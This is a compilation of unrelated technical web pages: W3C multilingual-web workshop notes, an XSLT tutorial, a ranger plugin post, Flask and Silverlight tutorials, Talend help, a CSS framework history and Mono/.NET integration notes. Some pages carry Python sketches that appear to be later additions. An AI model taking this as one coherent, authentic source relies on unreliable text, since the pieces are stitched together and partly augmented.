David: CMS-l10n roundtrip, term management, and harmonisation efforts ... Seemed to cover many issues in the existing ITS 2.0–XLIFF mapping, e.g. terminology (usage and forbidden) ... But do need some standardized APIs, connectors and brokers ... In terminology need a message broker, especially in interactive scenarios with multiple terminology systems in real time

Juan Pane: Focus on 3 use cases: ... 1) Recognition, e.g. named entity recognition and resolution, focussed on person names, for MT, for search and also segmentation (over line boundaries) ... 2) Display: sorting names in lists. Contextual usage – formal, familial, full (postal), autocompletion, abbreviation (e.g. in paper author lists), text-to-speech ... 3) Capturing names: transliteration, speech-to-text, input forms – size, order of labels ... Problems listed ... Propose perhaps to define an ontology of names

Reinhard: Discussed different scenarios, e.g. for commercial and for non-market/non-profit settings, people's motivation and associated support systems ... Practical implementations: environments need to be easy to use, looking at Easyling, FAO and SOLAS ... Too few to set up a bigger group, but invite others to participate

Christian Lieske: why do we need an additional terminology-related standard, can't we reuse existing LOD mechanisms?

David Filip: agrees that linked data can help, but need specific support for terminology. This area also suffers from many poorly adopted standards, so a new one might make sense.

Christian Lieske: good to bring the LOD and terminology communities together

David Filip: agrees, standards harmonisation is key to going forward. But there is also a gap at the API level

Felix: looks for more standardisation people and localisation companies in the multilingual LOD best-practice group

Des: supports this call ... asks about CMIS

David Filip: yes, work

Pedro: we are going to GALA, so if there is a clear message we will

Ioannis: also visiting an industrial term working

Dave: let's open the group now, so we have a concrete URL to point people at

Christian Lieske: how will the names discussion advance?
Richard: no specific plans

David Filip: asks about locatives in names

Richard: not addressed this yet, as there were more immediate use cases; nor inflection, or other context

Dave: asks if the I18n interest group is a good place for this

Richard: a community group can be more focussed; an IG may reach more people, but a CG can be more focussed

Felix: agree we need to think about where best to place this. But in all cases we need a hero to drive it forward – the ML-LOD BP group seems to have two to three

Richard: +1, need a committed driving person

Des: wrap up there, thanks everyone

Arle: Slides will be available soon, by next week. Linked from the programme page ... There is streaming video available already, provided by FAO, and better-quality lectures available from VideoLectures ... A report will be produced soon, based on the scribes' notes ... Thanks to sponsors: Verisign, who supported the workshop and dinner, and QTLaunchpad; FAO for local support; DFKI and Nieves, and Felix. Thanks to the EC and their sponsorships, W3C for a logistical home, the programme committee, organizing group, speakers, chairs and scribes (especially Felix) ... Funding for the conference series comes from MLW-LT, which finished at the end of the year. Waiting to hear on further funding from EU projects, but if anyone has further opportunities for funding or is willing to host future events, please talk to Felix or Arle.
http://www.w3.org/International/multilingualweb/rome/IRC/13-mlwrome-irc.html
Transformations are an idea as old as human thought. Primitive societies had werewolves, werebears, and weretigers. The Greeks had warnings against seeing goddesses bathe, unless one was interested in going to parties stag, literally. During the Renaissance, there was Shakespeare's A Midsummer Night's Dream, in which Bottom was made an Ass of. Today we have Jack Chalker's Midnight at the Well of Souls and the Borg from Star Trek. And although the transformations in each of these stories dealt with the physical world and XSLT can affect only XML, they all share many of the same characteristics: Without change, the story can progress no further.

As one who has been working in the programming field for a number of years, I can attest to one thing: About 40 percent of the time, the data is in the wrong format. In ancient times, when great beasts with names such as System/360 roamed the earth, this was a major problem. Programs had to be changed or written from scratch to massage the data to make it usable. Changing programs and creating programs has always been a costly undertaking in any day and age.

Now things are different, as time seems to be speeding up. The great beasts are all either dead or behind glass in museums, where people can stare in awe, never realizing that the old 486 machine that they gave to their kids had more power. Today much of the information that we deal with is in the form of XML, which, interestingly enough, can be transformed by XSLT in much the same manner as Lon Chaney was by the full moon. Thankfully, however, the XML doesn't get hairy (unless, of course, we want it to).

Here's the quandary: On the client side, we have XML and we want HTML. It's a real pain in the gluteus, isn't it? Yes, we can write a script to perform the conversion, but it is a time-consuming task accomplished with ill-suited tools. Face it: The majority of scripting languages aren't really built to handle XML.
When messing around with individual nodes, JavaScript's XML support comes across like a Bose sound system in a Ford Pinto. I'm not saying that it doesn't work; it works just fine, but, unfortunately, six months later it has a tendency to cause questions like, "I wrote this?" XSLT, as opposed to JavaScript, was designed from the ground up to handle XML. Come to think of it, XSLT is itself a dialect of XML. This has a tendency to lead to some really interesting style sheets when working with XSLT, but that is a topic for another day. Another interesting thing is that although the input has to be XML, nothing says that the output needs to be XML. This means that if you want to transform XML into HTML as opposed to XHTML, by all means do it, but just remember that if you're using SOAP, the package must be well formed.

Back in the old days, during the first browser wars, Microsoft released Internet Explorer version 5.0, the first web browser with XSLT support. It would have been a major victory for Microsoft, if it had not been for one little detail. In their haste, they forgot one little thing about the World Wide Web Consortium's recommendations. You see, recommendations are often vastly different from drafts. In an effort to produce the first browser with XSLT support, Microsoft used a draft as a guide. For this reason, you sometimes see references to the draft namespace, http://www.w3.org/TR/WD-xsl, instead of the recommendation's http://www.w3.org/1999/XSL/Transform. It was only with the advent of Microsoft Internet Explorer 6 that Internet Explorer started following the recommendation instead of the draft. Personally, I believe that it is a good idea to ignore the old namespace entirely; I think that Microsoft would like to. And although they're currently considered, at most, the third most popular browser, individuals using versions 5.0, 5.01, and 5.5 of Internet Explorer comprise only a fraction of the general population.
It is a pretty safe bet that you can ignore these web browsers entirely without alienating anyone but technophobes, the White House, and project leaders who use the term blink.

Earlier I stated that XPath was the targeting device for XSLT, which is essentially true. XPath is used to describe the XML node or nodes that we're looking for. As the name suggests, XPath describes the path to the node that we're looking for. For example, let's say that we want the state_name node in the XML document shown in Listing 11-1. A number of different ways exist for locating it, some of which are shown in Listing 11-2.

/states/state/state_name
/*/*/state_name
/*/*/*[name(.) = 'state_name']
/states/state/*[2]
//state_name

Why so many? With XPath, it is possible to describe complete paths, paths with wildcards, and paths based upon a node's location, or to describe only the node itself. From a high level, such as an orbital view, it works as shown in Table 11-1.

XPath Notation              Description
/                           Either the root node, in the case of the first slash, or a separator between nodes
//                          Anywhere in the document that meets the criteria
*                           Wildcard (I know that there is a node here, but I don't know its name)
.                           The context node (where we are at this point)
[2]                         A predicate stating that the second node is the one we want
states, state, state_name   Qualified node names
name()                      A function that returns the name of the passed node
[name(.) = 'state_name']    A predicate stating that the desired node name is state_name

Alright, that should be enough XPath to get started. Now let's take a gander at the XSLT shown in Listing 11-3, whose purpose is to build an HTML select object using the XML from Listing 11-1.

<?xml version='1.0'?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="html"/>

  <xsl:template match="/">
    <select id="myselect" name="myselect">
      <xsl:for-each select="/states/state">
        <xsl:element name="option">
          <xsl:attribute name="value">
            <xsl:value-of select="*[1]"/>
          </xsl:attribute>
          <xsl:value-of select="state_name"/>
        </xsl:element>
      </xsl:for-each>
    </select>
  </xsl:template>
</xsl:stylesheet>

Pretty cool, isn't it?
At first glance, not only is it nicely indented, but it also has the advantage of being one of the most obscure things that you've ever laid your eyes upon. A second glance reveals some details that you might have missed the first time; for example, the select statement looks remarkably like HTML. There is a very good reason for the resemblance: It is HTML. In fact, the xsl:output statement even says that it is HTML, and you can take it from me, xsl:output statements don't lie.

Upon closer examination, some other details might pop out, such as the xsl:template with match="/". From what we covered earlier, the slash means that we're looking for the root node. And while we're examining XPath, you'll find xsl:for-each with select="/states/state". Just in case you're wondering, for-each means exactly what you think it does: Iterate once for every node that matches the predicate. Another thing that might jump out is the xsl:element node with name="option". This is an alternate method of specifying an output element. The xsl:attribute also does exactly what you'd expect from its name; it defines an attribute of the previous xsl:element. Finally, the xsl:value-of simply copies the node's content from the source document to the output document.

In a nutshell, that's pretty much the basics of XSLT and XPath. The next question, of course, is, "So, what does the output HTML look like?" For the answer, check out Listing 11-4.

<select id="myselect" name="myselect">
  <option value="AB">Alberta</option>
  <option value="AK">Alaska</option>
  <option value="AL">Alabama</option>
  <option value="AR">Arkansas</option>
</select>

Later, both in this chapter and in others, you'll find more detailed examples of client-side XSLT.

Back when I was first learning XSLT, I was developing with the bare minimum, a text editor and a copy of Microsoft Internet Explorer version 5.01, and I was happy!
Well, at least for about 20 minutes or so, right up to the point I read the World Wide Web Consortium's XSLT recommendation. But we've already covered that, and after I downloaded a copy of Internet Explorer version 6, I was happy again, at least until I found Mozilla and then Firefox. My first impression was that there was something wrong with the Gecko XSLT processor, but there was a gnawing doubt. The reason for this was that I'd never personally found an error in a Gecko-based browser, and I had found several in Internet Explorer. So with a critical eye and a hard copy of the recommendation, I began to examine the "bugs" that I had found in the Gecko XSLT processor. The results came as no surprise to me. Gecko strictly followed the published recommendation, whereas IE seemed somewhat looser around the edges. My problem was that I had developed some bad habits developing in a microcosm and had a tendency to tailor my code to that microcosm. Because of this, I now try out my style sheets in at least two different XSLT processors before I consider them even partially tested.

Let's take a look at how to create an instance of the XSLT processor in Microsoft Internet Explorer and every other web browser on the planet... er, I mean Firefox, yeah, Firefox. Listing 11-5 shows a little cross-browser web page that uses a single XML data island containing the XML, while the XSLT is loaded from the server via the XMLHttpRequest object. This is nothing flashy, merely a "proof of concept." It just creates an HTML select object and plops it on a page.
<html>
  <head>
    <title>XML Data Island Test</title>
    <style type="text/css">
      xml { display: none; font-size: 0px }
    </style>
    <script language="JavaScript">
      var _IE = (new RegExp('internet explorer','gi')).test(navigator.appName);
      var _XMLHTTP;                   // XMLHttpRequest object
      var _objXML;                    // XML DOM document
      var _objXSL;                    // Stylesheet
      var _objXSLTProcessor;          // XSL Processor
      var _xslt = 'stateSelect.xsl';  // Path to style sheet

      /*
        Function:   initialize
        Programmer: Edmond Woychowsky
        Purpose:    Perform page initialization.
      */
      function initialize() {
        if(_IE) {
          _XMLHTTP = new ActiveXObject('Microsoft.XMLHTTP');
          _objXML = new ActiveXObject('MSXML2.FreeThreadedDOMDocument.3.0');
          _objXSL = new ActiveXObject('MSXML2.FreeThreadedDOMDocument.3.0');
          _objXML.async = false;
          _objXSL.async = false;
          _objXML.load(document.getElementById('xmlDI').XMLDocument);
        } else {
          var _objParser = new DOMParser();

          _XMLHTTP = new XMLHttpRequest();
          _objXSLTProcessor = new XSLTProcessor();
          _objXML = _objParser.parseFromString(document.getElementById('xmlDI').innerHTML, "text/xml");
        }

        _XMLHTTP.onreadystatechange = stateChangeHandler;
        _XMLHTTP.open('GET',_xslt,true);
        _XMLHTTP.send(null);
      }

      /*
        Function:   stateChangeHandler
        Programmer: Edmond Woychowsky
        Purpose:    Handle the asynchronous response to an XMLHttpRequest,
                    transform the XML data island and display the resulting
                    XHTML.
      */
      function stateChangeHandler() {
        var strXHTML;

        if(_XMLHTTP.readyState == 4) {
          if(_IE) {
            var _objXSLTemplate = new ActiveXObject('MSXML2.XSLTemplate.3.0');

            _objXSL.loadXML(_XMLHTTP.responseText);
            _objXSLTemplate.stylesheet = _objXSL;
            _objXSLTProcessor = _objXSLTemplate.createProcessor();
            _objXSLTProcessor.input = _objXML;
            _objXSLTProcessor.transform();
            strXHTML = _objXSLTProcessor.output;
          } else {
            var _objSerializer = new XMLSerializer();

            _objXSL = _XMLHTTP.responseXML;
            _objXSLTProcessor.importStylesheet(_objXSL);
            strXHTML = _objSerializer.serializeToString(_objXSLTProcessor.transformToFragment(_objXML, document));
          }

          document.getElementById('target').innerHTML = strXHTML;
        }
      }
    </script>
  </head>
  <body onload="initialize()">
    <xml id="xmlDI">
      <!-- states XML from Listing 11-1 (elided) -->
    </xml>
    <b>XML client-side transformation test</b>
    <div id="target"></div>
  </body>
</html>

Alright, now that the proof of concept has been successfully completed, all that remains is to see how it can be applied to our e-commerce website. Now that we have some of the basics down, let's take a look at how XSLT can be used to provide additional functionality to our e-commerce website. I should point out, however, that when I originally proposed this idea to a client, I was called insane. The comments were that it would be unworkable and that nobody in their right mind would have even suggested it. In my defense, this was the client that used terms such as blink and was "looking into" converting all web applications into COBOL so that developers other than the consultants could understand it.

That's enough introductions; without further ado, allow me to describe what I consider the ultimate "mad scientist" website. Excluding pop-ups, the site would be a single web page, with all communication between the server and the client taking place using the XMLHttpRequest object. Instead of subjecting the visitor to an endless cycle of unloads and reloads, the page would simply request whatever it needed directly.
In addition, when a particular XSLT was obtained from the server, the client would cache it, meaning that the next time it was needed, it would already be there. It was within the realm of possibility that eventually the client would have all the XSLT cached on the web browser. The more the visitor did, the better the shopping experience would become. Needless to say, the website was never created, alas, and my contract was terminated because they felt that resources could be better used supporting their mainframe applications. Personally, I think that they lacked foresight, and if they had pursued the concept to its logical conclusion, they'd now be mentioned in the same breath as Google. Instead, they decided to regress into the future of the 1960s as opposed to the future of the twenty-first century. But I'm hardly an objective observer.
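The browser-bound code above is hard to experiment with outside Internet Explorer or Firefox, but the logic of the Listing 11-3 transform itself is easy to mirror on the command line. The following sketch is not the chapter's code: Python's standard library has no XSLT processor, so it walks a states document by hand, and since Listing 11-1 is not reproduced in this excerpt, the abbreviation element name (and the two-state sample) are assumptions.

```python
import xml.etree.ElementTree as ET

# Sample document shaped like Listing 11-1. Only state_name is confirmed
# by the chapter; state_abbreviation is an assumed name for the first child.
STATES_XML = """\
<states>
  <state><state_abbreviation>AB</state_abbreviation><state_name>Alberta</state_name></state>
  <state><state_abbreviation>AK</state_abbreviation><state_name>Alaska</state_name></state>
</states>"""

def states_to_select(xml_text):
    """Mirror Listing 11-3: build an HTML select from the states XML."""
    root = ET.fromstring(xml_text)
    options = []
    # Equivalent of <xsl:for-each select="/states/state">
    for state in root.findall('./state'):
        abbrev = state[0].text                 # first child, like XPath *[1]
        name = state.find('state_name').text   # confirmed node name
        options.append('<option value="{}">{}</option>'.format(abbrev, name))
    return ('<select id="myselect" name="myselect">'
            + ''.join(options) + '</select>')

print(states_to_select(STATES_XML))
```

Running it prints the same kind of markup as Listing 11-4, which makes it a convenient sanity check when tweaking the real style sheet.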
http://www.yaldex.com/ajax_tutorial_2/ch11lev1sec1.html
Writing a git-annex plugin for ranger

I use git-annex to distribute and synchronize fairly large and mostly static files across different machines. However, being based on Git makes it pretty uncomfortable to use from the command line. So, why not integrate it into our favorite command line file manager, ranger? Because I struggled a bit with ranger's internals, I will outline how I wrote the plugin.

Initialization

First of all, we need a place for our plugin. By default ranger imports every Python module from $XDG_CONFIG_HOME/ranger/plugins in lexicographic order. If $XDG_CONFIG_HOME is not set, ~/.config is used as the default alternative. To use the plugin from within ranger, you need to provide code that hooks into one of the two methods provided by the ranger API. hook_init is called before the UI is ready, which means you can dump output on stdout, whereas the UI can be used in hook_ready. The suggested way is not to replace the original function but to chain up like this:

import ranger.api

old_hook_init = ranger.api.hook_init

def hook_init(fm):
    # setup
    return old_hook_init(fm)

ranger.api.hook_init = hook_init

Adding new commands

In the introductory post, I briefly explained how to write custom commands which you add to your commands.py file: You simply subclass ranger.api.commands.Command and write code in the execute method. However, commands defined in a plugin are not automatically added to the global command list. For this you need to extend the commands dictionary of the file manager instance, i.e.

def hook_init(fm):
    fm.commands.commands['annex_copy'] = copy

When using the annex_copy command, tab completion should cycle through all available remotes. This is done by returning an iterable in the tab method.
In the execute method you can access arguments by calls to the arg method:

class copy(ranger.api.commands.Command):
    def tab(self):
        return ('annex_copy {}'.format(r) for r in remotes)

    def execute(self):
        remote = self.arg(1)

Asynchronous calls

The git-annex plugin works on the current file or the currently selected list of files, which you can get via fm.env.get_selection(). To avoid blocking the UI while fetching large files, I use the CommandLoader to run the git annex commands in the background (thanks @hut). The loader emits a signal when the action is finished, to which we subscribe in order to refresh the directory content:

class copy(ranger.api.commands.Command):
    def execute(self):
        remote = self.arg(1)

        def reload_dir():
            self.fm.thisdir.unload()
            self.fm.thisdir.load_content()

        for path in (str(p) for p in self.fm.env.get_selection()):
            fname = os.path.basename(path)
            cmd = ['git', 'annex', 'copy', '-t', remote, fname]
            loader = CommandLoader(cmd, "annex_copy to remote")
            loader.signal_bind('after', reload_dir)
            self.fm.loader.add(loader)

Long-running actions can be cancelled by the user, so if you need to clean up you should add that extra code to the cancel method.

Wrap up

That's it: a plugin that registers new commands for interacting with git-annex in an asynchronous way. Bug reports and pull requests are welcome.
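Since both snippets only make sense inside a running ranger instance, it may help to see the hook-chaining convention in isolation. This sketch substitutes a stand-in object for ranger.api (the stand-in and its "core init" behaviour are invented for illustration), but the wrapping pattern is exactly the one the plugin relies on:

```python
import types

# Stand-in for the ranger.api module; only hook_init matters here.
api = types.SimpleNamespace()
api.hook_init = lambda fm: fm.append('core init')   # the "original" hook

# The plugin chains up: keep a reference to the old hook, run our own
# setup, then call the old hook so everything else still initializes.
old_hook_init = api.hook_init

def hook_init(fm):
    fm.append('plugin setup')   # e.g. fm.commands.commands['annex_copy'] = copy
    return old_hook_init(fm)

api.hook_init = hook_init

# ranger would call the hook once at startup; both pieces of setup run,
# the plugin's first and the original afterwards.
calls = []
api.hook_init(calls)
print(calls)
```

Because every plugin wraps whatever hook it finds, any number of plugins loaded in lexicographic order end up chained together automatically.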
https://bloerg.net/posts/writing-a-git-annex-plugin-for-ranger/
Step 3: Installing flaskr as a Package¶

Flask is now shipped with built-in support for Click. Click provides Flask with enhanced and extensible command line utilities. Later in this tutorial you will see exactly how to extend the flask command line interface (CLI).

A useful pattern to manage a Flask application is to install your app following the Python Packaging Guide. Presently this involves creating two new files, setup.py and MANIFEST.in, in the project's root directory. You also need to add an __init__.py file to make the flaskr/flaskr directory a package. After these changes, your code structure should be:

/flaskr
    /flaskr
        __init__.py
        /static
        /templates
        flaskr.py
        schema.sql
    setup.py
    MANIFEST.in

Create the setup.py file for flaskr with the following content:

from setuptools import setup

setup(
    name='flaskr',
    packages=['flaskr'],
    include_package_data=True,
    install_requires=[
        'flask',
    ],
)

When using setuptools, it is also necessary to specify any special files that should be included in your package (in the MANIFEST.in). In this case, the static and templates directories need to be included, as well as the schema. Create the MANIFEST.in and add the following lines:

graft flaskr/templates
graft flaskr/static
include flaskr/schema.sql

Next, to simplify locating the application, create the file flaskr/__init__.py containing only the following import statement:

from .flaskr import app

This import statement brings the application instance into the top level of the application package. When it is time to run the application, the Flask development server needs the location of the app instance. This import statement simplifies the location process. Without the above import statement, the export statement a few steps below would need to be export FLASK_APP=flaskr.flaskr.

At this point you should be able to install the application. As usual, it is recommended to install your Flask application within a virtualenv.
With that said, from the flaskr/ directory, go ahead and install the application with:

pip install --editable .

The above installation command assumes that it is run within the project's root directory, flaskr/. The editable flag allows editing source code without having to reinstall the Flask app each time you make changes. The flaskr app is now installed in your virtualenv (see the output of pip freeze).

With that out of the way, you should be able to start up the application. Do this on Mac or Linux with the following commands in flaskr/:

export FLASK_APP=flaskr
export FLASK_DEBUG=true
flask run

You can then view the application at http://127.0.0.1:5000/ in a browser. When you head over to the server in your browser, you will get a 404 error because we don't have any views yet. That will be addressed a little later, but first, you should get the database working.

Externally Visible Server

Want your server to be publicly available? Check out the externally visible server section for more information.

Continue with Step 4: Database Connections.
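The from .flaskr import app re-export is the detail that lets FLASK_APP stay short, and its effect can be seen without Flask at all. The sketch below builds a throwaway package with the same shape as flaskr/flaskr; the module contents are dummies standing in for the real application:

```python
import os
import sys
import tempfile

# Build a throwaway package shaped like the tutorial's layout:
# an inner flaskr.py defining `app`, and an __init__.py lifting it up.
root = tempfile.mkdtemp()
pkg = os.path.join(root, 'flaskr')
os.makedirs(pkg)

with open(os.path.join(pkg, 'flaskr.py'), 'w') as f:
    f.write("app = 'pretend Flask instance'\n")

with open(os.path.join(pkg, '__init__.py'), 'w') as f:
    f.write('from .flaskr import app\n')

sys.path.insert(0, root)
import flaskr

# Without the re-export, `app` would only exist at flaskr.flaskr.app
# (hence FLASK_APP=flaskr.flaskr); with it, the package exposes it directly.
print(flaskr.app)
```

This is exactly why the development server can locate the app instance from the bare package name.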
http://flask.readthedocs.io/en/latest/tutorial/packaging/
Up till now in this tutorial series, we have been working in the C# window. In our last post we talked of collections of objects. From this tutorial on, we will spend more and more time in the XAML window rather than the C# window. Till now we have just seen XAML windows but haven't actually interacted with them, apart from dragging and dropping controls onto the visual editor. Now we will start using the XAML editor more aggressively as we build our application. As we have seen earlier, when we open any project in Silverlight, there are two panes facing us: one pane is the visual editor and the other holds the XAML code. Let's get started, then, by understanding how it works.

XAML is a language just as C# is a programming language; XAML is mainly used for designing the user interface. When we drag any control onto the visual editor, you might have observed that some code is added to the XAML window automatically. Similarly, when we change any property of a control, that too changes the XAML code. This is done automatically by Visual Studio for our convenience, and thus we get a very easy and simple-to-use drag-and-drop interface.

Now look at the top of the XAML window; you will see a few lines starting with "xmlns". What are these lines? These lines are namespaces. I hope you remember what namespaces are! These lines denote namespaces and the assemblies where those files are stored.

There are several layout controls which help users lay out their controls on-screen as they wish. Some of them are the stack panel, the grid, and so on. Let us create a button using XAML code. Create a new project with some meaningful name. Search for the following code:

<Grid x:Name="ContentPanel">
</Grid>

And in between those Grid tags paste the following code:

<Button Name="myButton" Height="100" Width="150" Content="Click me"
        HorizontalAlignment="Center" VerticalAlignment="Center"/>

Once you paste this code, notice that a new button will be created on the designer surface.
Congratulations, you have just created a button using nothing more than pure code. There is a lot to learn in the XAML window, but keep studying it until we are back with the next tutorial. In the next tutorial, we will learn about all the Silverlight layout controls.
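Since XAML is just XML, any XML tooling can read the markup above. The sketch below parses the button with Python's standard library; the xmlns URI is the usual Silverlight/WPF presentation namespace, added here only so the fragment is a complete document:

```python
import xml.etree.ElementTree as ET

# The Grid/Button markup from the tutorial, with the default namespace
# that Visual Studio normally declares on the page's root element.
XAML = """\
<Grid xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation">
  <Button Name="myButton" Height="100" Width="150" Content="Click me"
          HorizontalAlignment="Center" VerticalAlignment="Center"/>
</Grid>"""

NS = '{http://schemas.microsoft.com/winfx/2006/xaml/presentation}'

grid = ET.fromstring(XAML)
button = grid.find(NS + 'Button')

# Every attribute maps one-to-one onto a property of the Button control,
# which is why editing either pane keeps the other in sync.
print(button.get('Name'), button.get('Content'))
```

That one-to-one mapping between attributes and control properties is all the visual editor is doing when it regenerates the XAML for you.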
http://www.thewindowsclub.com/understanding-xaml-windows-phone-turorial-part-15
Talend Data Mapper provides you with the possibility to export your Structures as CSV files, Java classes or Avro files, to enable you to work with the exported files in external tools. The procedure for all three types of output file is more or less the same. Any particularities based on the type of structure are specified below.

To export Structures as CSV files, Java classes or Avro files, do the following:

1. Click File > Export. In the Export window that opens, expand Data Mapper and select CSV Export, Java Export or Avro Export as appropriate, then click Next.
2. In the window that opens, expand your project in the left-hand pane and select the Structures checkbox, then select the checkboxes in the right-hand pane that correspond to the Structures you want to export.
3. In the To directory field, select the directory to which you want to export: click Browse, browse to the target directory (or click Make New Folder if the directory does not already exist), and then click OK.
4. [For Java classes] In the Java package name field, enter a name for the package you are going to create.
5. [For Avro files] In the Avro namespace field, enter a name for the Avro namespace.
6. Click Finish to complete the process.
https://help.talend.com/reader/YTUJp4~lScETGDBqSSOt5g/XQ89dX5mUG9oJaF5qE0Uew
Up until a few years ago, most people didn't put much thought into „CSS architecture" (I'm quite sure it wasn't even a thing). Around the year 2009, some sophisticated frontend folks (most notably Nicole Sullivan) started talking about concepts like OOCSS.

/* Typical CSS code, ca. 2010 */
.selector ul > li #imAnID {
  background-color: hotpink !important;
}

I tinkered around with OOCSS and really liked it, so I started to build some reusable components and used them for my personal projects. Life was nice and easy. In the year 2011 Bootstrap was released and quickly gained traction. Although I liked many parts of Bootstrap, there were some aspects I didn't agree with. So, as almost every self-respecting programmer does at some point in life, I made a momentous decision: I should make my own framework. avalanche was born (obligatory XKCD link).

avalanche 2.x.x and 3.x.x

avalanche 1.x.x was basically a collection of BEM-style OOCSS components. It was not until version 2.x.x that it became interesting. I moved all components into separate GitHub repositories and made them work as Bower packages. I also split the packages into different types (mostly based on the ITCSS convention). The biggest change from version 2.x.x to 3.x.x was the switch to npm instead of Bower. With version 3.x.x I also tried to push SASS to its limits and made almost every aspect of the packages configurable.

// 3.x.x example code (grid object package).
.#{$o-grid-namespace} {
  @include o-grid($o-grid-flex, $o-grid-flex-fallback);

  @if $o-grid-spaced-vertical-default-size {
    @include o-grid-spaced-vertical(map-get($spacing, $o-grid-spaced-vertical-default-size), '.#{$o-grid-namespace}__item');
  }

  @if $o-grid-spaced-horizontal-default-size {
    @include o-grid-spaced-horizontal(map-get($spacing, $o-grid-spaced-horizontal-default-size), '.#{$o-grid-namespace}__item');
  }
}

.#{$o-grid-namespace}__item {
  @include o-grid-item($o-grid-flex, $o-grid-flex-fallback);
}

This was powerful and flexible, but also very hard to explain to other developers. One other major pain point still existed in version 3.x.x: packages depended on the avalanche core and were not usable without it.

4.x.x

I already knew that a package-based workflow is superior to a monolithic approach, but one thing I learned from my experience building and using avalanche was: it is very hard to build reusable packages. One of the biggest problems with package-based CSS workflows I encountered is that CSS, and even SASS or LESS, do not provide all the tools necessary to efficiently integrate packages into your project.

// JavaScript modules are awesome.
import { Stuff, OtherStuff } from 'SomeModule';

We need more tooling

In the JavaScript world this problem has been solved for a few years now. The require() syntax and, more recently, the standard ES6 import syntax, solve this problem very elegantly. But those are solutions which are only possible thanks to tooling: not even the latest modern browsers support import. Ironically, CSS has supported @import natively for at least 15 years. But until the invention of preprocessors like SASS and LESS it was almost useless. And even with preprocessors, the @import rule is still lacking functionality.

- Multiple imports of the same file: preprocessors import a file multiple times when they encounter the same @import rule multiple times in the code, which leads to code duplication.
- Importing only specific selectors: in the front-end world every byte matters, and therefore it is quite costly to @import a complete package if you just need one class from it.
- Selectors should match the project's naming convention: if you use a third-party CSS package, you do not want to end up with a mixture of different naming conventions for CSS selectors.

For my idea of how avalanche 4.x.x should work, I needed a solution for those three problems. That's why I built node-sass-magic-importer, a custom node-sass importer.

Standalone packages

What really bothered me with version 3.x.x was that all the packages still depended on the core avalanche package. With version 4.x.x packages are built in a way so that they can work standalone. Packages are now far less configurable, but thanks to the node-sass-magic-importer most of the configuration options aren't necessary anymore. Instead of controlling the output of packages with variables, the user can import only the selectors he or she needs from the package.

// Importing only specific selectors from an avalanche 4.x.x package.
@import '{ .u-width-12/12, .u-width-4/12@m } from ~@avalanche/utility-width';

// Replace selectors to match the project's naming convention.
@import '{ .u-width-6/12 as .half-width } from ~@avalanche/utility-width';

Monorepo

Splitting packages into separate Git repositories was a nice idea, but it led to a lot of code duplication and overall more maintenance work. Some big open source projects recently made the switch to a monorepo structure (e.g. Babel). At first it really seems counterintuitive to make a monorepo for building a package-based CSS framework. Using packages is easier when they are tiny and easy to understand without having to know anything about the code, but building them is much less painful if you can see the big picture. Thinking about it that way supports the case for a monorepo approach.
Testing

Being an open source maintainer really made me fall in love with automated testing. Without tests you can't be sure that a bugfix or a new feature didn't break something in your project. You live in constant fear that, after a new release, bug report notifications flood your inbox. Although automated tests are not a huge thing in the CSS world, I really wanted to have a system in place to prevent me from releasing faulty code. Every avalanche 4.x.x package comes with its own regression tests, and a new release is only created if all the packages pass their tests. BackstopJS is used to run the tests.

Conclusion

For now I'm quite happy with the latest release of avalanche. I made the packages work standalone, optimized the development process by using a monorepo approach, and made development less fragile by adding regression tests. I do not expect avalanche to be the next Bootstrap or even to be used by many people. What I hope for is that other people keep working on better ways of building design systems with CSS, and that avalanche may serve as an inspiration for some of those people.
https://markus.oberlehner.net/blog/building-avalanche-v4/
.NET Source Code Integration

With the recent open sourcing of parts of .NET, we want to bring the best pieces of .NET to Mono, and contribute the cross-platform components of Mono to the .NET efforts. This document describes the strategies that we will employ. We are tracking the most recent development in a task on GitHub.

Background

Microsoft is open sourcing .NET in two ways:

.NET Core: a re-imagined version of .NET that is suitable to be deployed alongside web apps and places a strong focus on a new set of assemblies and APIs based on the PCL 2.0 profile. This is a full open source project, with Microsoft taking contributions and developing in the open.

Parts of the .NET Framework: these are parts of the .NET Framework as it ships on Windows, and the API that Mono has been implementing over the years. The version published here is a snapshot of the .NET Framework source code. While Microsoft is publishing the source code, they are not actively developing this tree in the open, nor are they taking patches.

Considerations

This section lists a set of issues to keep in mind while bringing the Microsoft .NET source code into Mono, and what we need to keep in mind as we upgrade the code. The list of issues below identifies the constraints on bringing .NET code into Mono.

Mono's Platform Specific Code

In numerous instances, Mono contains platform-specific code which is currently missing from .NET. There are a wide variety of features like this. Some examples include the System.Environment class, which provides a platform-specific set of locations for applications to look up certain well-known file system locations, and the Registry class, which provides an abstraction that maps to Windows APIs or a file-backed implementation on Unix.

Mono's Classes with Tight Runtime Integration

Some of the APIs in the .NET Framework are bound to have tight dependencies on their runtime implementation, just like Mono's implementation does.
There are cases where we might want to take on the extra challenge of doing the runtime integration work (for example, switching from our barely maintained decimal support to Microsoft's version would be a win). In other cases, the amount of work is not worth the changes, like the support for System.Reflection.Emit.

Mono Profiles

Mono ships a mobile API profile which is designed to be a lightweight API profile and is used in mobile devices, game consoles and the Mono for Unreal Engine project. The Mobile Profile basically removes some of the heavier .NET dependencies from the system. It mostly deals with removing System.Configuration dependencies from our class libraries.

Mono Core

In the long term, we want to adopt a .NET Core-like approach, where we have a thin layer of platform/VM-specific APIs, and we allow users to use Mono in the same way that .NET Core can be used, without the large libraries/profiles.

Mono Classes are Linker Friendly

Some of the class libraries in Mono have been designed to keep the result linker-friendly, an important piece of functionality required by our Android and iOS deployments. This comes in the form of replacing a runtime weak association with a strong association, or teaching our linker and class libraries about connections between certain classes and their requirements. Many of those links would likely exist in .NET as well, but we would need to ensure that we do not regress when incorporating code here.

Base Class Libraries Bootstrapping

The bootstrapping of the core libraries is not exactly fun. Microsoft has cyclic dependencies among various assembly groups. For example mscorlib, System, System.Xml, System.Configuration and System.Core are built referencing each other's types. Another cluster includes the System.Web family. Mono currently has a multi-stage build process to create these libraries that have cyclic dependencies.
Bringing new code from Microsoft is possible, but for each class that we bring, we might need to adjust the cyclic dependency build.

Missing Resources

The distribution does not include the resources for some of the code. These manifest themselves as references to a class called "SR". We are going to need to autogenerate those.

Limited Man Power

We have limited manpower, so when bringing code from .NET, we need to pick our battles. The pieces of Mono that have been used the most are of higher quality than the pieces that have not been used very much, or have not been maintained for a long time. It is best to focus our efforts on the high-value targets in the .NET class libraries rather than to bring things that are known to work well in Mono and are well tested.

Some .NET Code might not be complete

